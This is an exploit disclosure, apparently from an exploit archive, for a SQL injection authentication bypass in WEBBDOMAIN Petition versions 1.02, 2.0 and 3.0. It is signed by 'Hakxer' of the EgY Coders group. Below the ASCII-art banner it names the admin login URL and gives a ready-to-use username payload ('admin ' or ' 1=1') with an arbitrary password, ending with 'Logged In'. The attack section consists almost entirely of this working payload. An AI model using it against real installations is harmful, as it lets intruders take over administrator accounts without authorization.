WEBBDOMAIN Petition versions 1.02, 2.0, and 3.0 suffer from a SQL injection vulnerability that allows for authentication bypass.
e80f21930d6292389e885d9bac5c34ef3b41461be781add1ae43eef36e996ab0
###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/ EgY Coders Vulnerability Research TM
# [~] Discovered by : Hakxer
# [~] Type Gap : WEBBDOMAIN Petition Auth Bypass
# [~] Script :https://webbdomain.com/php/petition/petition.php
# [~] Greetz : Allah
##########################################################################
|| Auth Bypass ||
https://webbdomain.com/php/petition/admin/
Username : admin ' or ' 1=1
password : Hakxer
Logged In ...
# Proud To be a Muslim #
#_=END=_#